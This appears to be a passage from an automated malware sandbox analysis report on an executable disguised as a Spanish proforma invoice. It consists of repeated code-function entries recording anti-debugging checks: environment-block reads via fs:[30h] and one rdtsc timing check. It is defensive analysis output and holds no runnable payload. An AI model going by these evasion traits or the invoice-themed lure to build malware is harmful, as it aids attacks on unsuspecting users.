              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 rdtsc 2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00401F03 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401F03
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_707E1BFF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730670 mov eax, dword ptr fs:[00000030h]2_2_36730670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772670 mov eax, dword ptr fs:[00000030h]2_2_36772670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]2_2_36727662
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]2_2_36743660
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]2_2_367B166E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676666D mov esi, dword ptr fs:[00000030h]2_2_3676666D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676666D mov eax, dword ptr fs:[00000030h]2_2_3676666D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36765654 mov eax, dword ptr fs:[00000030h]2_2_36765654
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673965A mov eax, dword ptr fs:[00000030h]2_2_3673965A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov ecx, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]2_2_3676265C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36733640 mov eax, dword ptr fs:[00000030h]2_2_36733640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]2_2_3674F640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h]2_2_3676C640
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]2_2_3672D64A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]2_2_3672D64A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730630 mov eax, dword ptr fs:[00000030h]2_2_36730630
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760630 mov eax, dword ptr fs:[00000030h]2_2_36760630
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov esi, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]2_2_367B8633
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]2_2_3676F63F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]2_2_3676F63F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737623 mov eax, dword ptr fs:[00000030h]2_2_36737623
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C mov eax, dword ptr fs:[00000030h]2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]2_2_36735622
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]2_2_36735622
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C620 mov eax, dword ptr fs:[00000030h]2_2_3676C620
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]2_2_367C3608
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]2_2_3675D600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]2_2_3675D600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF607 mov eax, dword ptr fs:[00000030h]2_2_367EF607
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676360F mov eax, dword ptr fs:[00000030h]2_2_3676360F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804600 mov eax, dword ptr fs:[00000030h]2_2_36804600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]2_2_367AC6F2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]2_2_367AC6F2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]2_2_367296E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]2_2_367296E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673C6E0 mov eax, dword ptr fs:[00000030h]2_2_3673C6E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]2_2_367356E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]2_2_367566E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]2_2_367566E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675D6D0 mov eax, dword ptr fs:[00000030h]2_2_3675D6D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367306CF mov eax, dword ptr fs:[00000030h]2_2_367306CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA6C0 mov eax, dword ptr fs:[00000030h]2_2_367FA6C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D86C2 mov eax, dword ptr fs:[00000030h]2_2_367D86C2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]2_2_367F86A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]2_2_367F86A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738690 mov eax, dword ptr fs:[00000030h]2_2_36738690
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AD69D mov eax, dword ptr fs:[00000030h]2_2_367AD69D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC691 mov eax, dword ptr fs:[00000030h]2_2_367BC691
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF68C mov eax, dword ptr fs:[00000030h]2_2_367EF68C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]2_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]2_2_3680B781
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]2_2_3680B781
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760774 mov eax, dword ptr fs:[00000030h]2_2_36760774
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]2_2_36734779
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]2_2_36734779
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36742760 mov ecx, dword ptr fs:[00000030h]2_2_36742760
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov ecx, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]2_2_36752755
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A750 mov eax, dword ptr fs:[00000030h]2_2_3676A750
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]2_2_3672F75B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DE750 mov eax, dword ptr fs:[00000030h]2_2_367DE750
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B174B mov eax, dword ptr fs:[00000030h]2_2_367B174B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B174B mov ecx, dword ptr fs:[00000030h]2_2_367B174B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36763740 mov eax, dword ptr fs:[00000030h]2_2_36763740
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676174A mov eax, dword ptr fs:[00000030h]2_2_3676174A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_368017BC mov eax, dword ptr fs:[00000030h]2_2_368017BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36759723 mov eax, dword ptr fs:[00000030h]2_2_36759723
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]2_2_3673471B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]2_2_3673471B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF717 mov eax, dword ptr fs:[00000030h]2_2_367EF717
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D700 mov ecx, dword ptr fs:[00000030h]2_2_3673D700
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]2_2_367F970B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]2_2_367F970B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]2_2_3672B705
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]2_2_3675270D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]2_2_367377F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]2_2_367377F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E7E0 mov eax, dword ptr fs:[00000030h]2_2_3675E7E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF7CF mov eax, dword ptr fs:[00000030h]2_2_367EF7CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367307A7 mov eax, dword ptr fs:[00000030h]2_2_367307A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]2_2_36761796
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]2_2_36761796
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738470 mov eax, dword ptr fs:[00000030h]2_2_36738470
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738470 mov eax, dword ptr fs:[00000030h]2_2_36738470
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF478 mov eax, dword ptr fs:[00000030h]2_2_367EF478
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA464 mov eax, dword ptr fs:[00000030h]2_2_367FA464
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D450 mov eax, dword ptr fs:[00000030h]2_2_3676D450
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D450 mov eax, dword ptr fs:[00000030h]2_2_3676D450
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
